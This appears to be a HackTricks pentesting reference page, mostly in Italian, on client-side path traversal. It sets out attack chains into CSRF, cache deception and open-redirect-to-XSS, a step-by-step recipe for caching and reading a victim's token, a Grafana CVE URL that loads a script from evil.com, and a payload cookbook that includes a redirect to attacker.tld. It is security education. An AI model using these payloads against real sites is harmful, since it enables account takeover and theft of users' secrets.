Client Side Path Traversal

Tip

Impara e pratica il hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Impara e pratica il hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporta HackTricks

Informazioni di base

A client side path traversal occurs when you can manipulate the path of a URL that is going to be sent to a user to visit in a legit way or that a user is somehow going to be forced to visit for example via JS or CSS. CSPT is also known as On-Site Request Forgery (OSRF) because it lets you coerce the victim’s browser into hitting arbitrary paths on the same origin with their cookies, JWTs, or mTLS certificates.

Fonti tipiche (dati che controlli):

  • Parametri di route che vengono concatenati in percorsi per fetch() o XHR (React Router, Next.js dynamic routes, Vue router params, Angular ActivatedRoute).
  • Valori memorizzati (profile slugs, document IDs) che vengono interpolati in percorsi all’interno di background jobs, service workers o URL WebSocket.
  • Componenti UI (download/export buttons, image galleries) che aggiungono frammenti controllati dall’utente o estensioni di file agli endpoint API prima che la richiesta venga inviata.

Sink tipici (dove finisce la traversal):

  • Frontend API wrapper che prefissano /api/ o /proxy/ e riutilizzano automaticamente gli header di auth.
  • Helper history.pushState / router.navigate che ricostruiscono URL più tardi durante la hydration.
  • <link>/<style>/@import generati da contenuti CMS o payload di feature-flag.

Impatti comuni & catene

  • CSPT ➜ CSRF/OSRF: dirottare chiamate autenticate POST/PUT/DELETE scappando dal percorso di risorsa previsto, poi rientrare in endpoint sensibili (password reset, payment approval, access revocation). Combina con la checklist CSRF per escalation.
  • CSPT ➜ cache deception / poisoning: servire JSON controllato dall’attaccante da chiavi CDN pubbliche e riprodurlo senza autenticazione. Vedi Cache Poisoning and Cache Deception.
  • CSPT ➜ Open Redirect ➜ XSS/SSRF: la traversal finisce su un endpoint open redirect, che poi rimbalza verso infrastruttura dell’attaccante che serve JS malevolo o payload SSRF. Catena con abusi Open Redirect.

Esempi di riscontri

  • In this writeup, it was possible to change the invite URL so it would end up canceling a card.
  • In this writeup, it was possible to combine a client side path traversal via CSS (it was possible to change the path where a CSS resource was loaded from) with an open redirect to load the CSS resource from an attacker controlled domain.
  • In this writeup, it’s possible to see a technique on how to abuse CSPT to perform a CSRF attack. This is done by monitoring all the data that an attacker can control (URL path, parameters, fragment, data injected in the DB…) and the sinks this data ends (requests being performed).
  • Check this browser extension to monitor that.
  • Check this CSPT playground to try the technique.
  • Check this tutorial on how to use the browser extension in the playground.

CSPT-assisted web cache poisoning/deception

CSPT can be chained with extension-based CDN caching to exfiltrate sensitive JSON leaked by authenticated API calls:

  • A frontend concatenates user-controlled input into an API path and attaches authentication headers in fetch/XHR.
  • By injecting dot-segments (../) you can retarget the authenticated request to a different endpoint on the same origin.
  • If that endpoint (or a path variant with a static-looking suffix like .css) is cached by the CDN without varying on auth headers, the victim’s authenticated response can be stored under a public cache key and retrieved by anyone.

Ricetta rapida:

  1. Trova codice SPA che costruisce URL API da parametri di percorso mentre invia header di auth.
  2. Identifica endpoint sensibili e testa suffissi statici (.css, .js, .jpg, .json) per vedere se il CDN cambia in Cache-Control: public/max-age e X-Cache: Hit restituendo JSON.
  3. Induci la vittima a visitare un URL che inietta traversal nel parametro SPA in modo che il fetch autenticato colpisca la variante del percorso cacheabile (per esempio, ../../../v1/token.css).
  4. Rileggi lo stesso URL in modo anonimo per ottenere il secret cachato (token → ATO).

Vedi dettagli e mitigazioni nella pagina Cache Deception: Cache Poisoning and Cache Deception.

Workflow di hunting & tooling

Scoperta passiva con proxy intercettanti

  • Correlate sources/sinks automatically: the CSPT Burp extension parses your proxy history, clusters parameters that are later reflected inside other requests’ paths, and can reissue proof-of-concept URLs with canary tokens to confirm exploitable traversals. After loading the JAR, set the Source Scope to client parameters (e.g., id, slug) and the Sink Methods to GET, POST, DELETE so the extension highlights dangerous request builders. You can export all suspect sources with an embedded canary to validate them in bulk.
  • Look for double-URL-decoding: while browsing with Burp or ZAP, watch for /api/%252e%252e/ patterns that get normalized by the frontend before hitting the network—these usually show up as base64-encoded JSON bodies referencing route state and are easy to overlook without an automated scanner.

Strumentare manualmente i sink della SPA

Inserire un breve snippet nei DevTools aiuta a far emergere traversal nascosti mentre interagisci con l’UI:

(() => {
const origFetch = window.fetch;
window.fetch = async function (input, init) {
if (typeof input === "string" && /\.\.\//.test(input)) {
console.log("[CSPT candidate]", input, init?.method || "GET");
debugger;
}
return origFetch.apply(this, arguments);
};
})();
  • Add similar wrappers around XMLHttpRequest.prototype.open, history.pushState, and framework-specific routers (e.g., next/router). Watching for init.credentials === "include" quickly narrows down requests that carry session cookies.
  • If the app stores routing hints in IndexedDB/localStorage, edit those entries with traversal payloads and reload—the mutated state is often reinjected into requests pre-hydration.

Lab & payload rehearsal

  • Spin up the CSPT Playground via docker compose up and practice chaining traversal ➜ CSRF ➜ stored XSS flows without touching the target. Reproducing the target’s router structure locally makes it easier to craft shareable PoCs.
  • Maintain a scratchpad of successful dot-segment variations (..;/, %2e%2e/, %2e./%2e/, UTF-8 homoglyphs) and suffix tricks (.css, .json, ; matrix params) you observed during recon so you can replay them quickly when a new sink appears.

Recent case studies (2025)

  • Grafana OSS CVE-2025-4123/6023 (v11.5.0+) – Un traversal gadget dentro /public/plugins/ ha permesso agli attacker di contrabbandare ../../ nel plugin asset loader, concatenarlo con l’open redirect di Grafana e costringere le vittime a caricare bundle di plugin controllati dall’attacker. Quando gli anonymous dashboards erano abilitati, un URL crafted come https://grafana.example.com/public/plugins/../../../../..//evil.com/poc/module.js portava il browser a eseguire JavaScript remoto; se il plugin Image Renderer era installato, la stessa primitive poteva essere convertita in SSRF reindirizzando le richieste di rendering verso host interni. Testa sempre insieme plugin asset paths, anonymous dashboards e renderer endpoints perché un singolo traversal spesso ti apre sia angoli XSS sia SSRF.

Payload cookbook

GoalPayload patternNotes
Hit sibling API under same origin?doc=../../v1/admin/usersFunziona quando i routers semplicemente concatenano /${doc}. Aggiungi .json se il CDN cache solo asset con aspetto statico.
Force SPA to follow open redirect?next=..%2f..%2f..%2flogin/callback/%3FreturnUrl=https://attacker.tld/xCombina con trusted redirectors presenti nel codebase del target. Chain con Open Redirect.
Abuse extension-based CDN cache?file=../../v1/token.cssIl CDN può trattare .css come statico e cacheare secret restituiti come JSON.
CSRF via verb change?action=../../payments/approve/.json&_method=POSTAlcuni routers accettano override _method; abbinalo al traversal per reindirizzare endpoint destructive.

References

Tip

Impara e pratica il hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Impara e pratica il hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporta HackTricks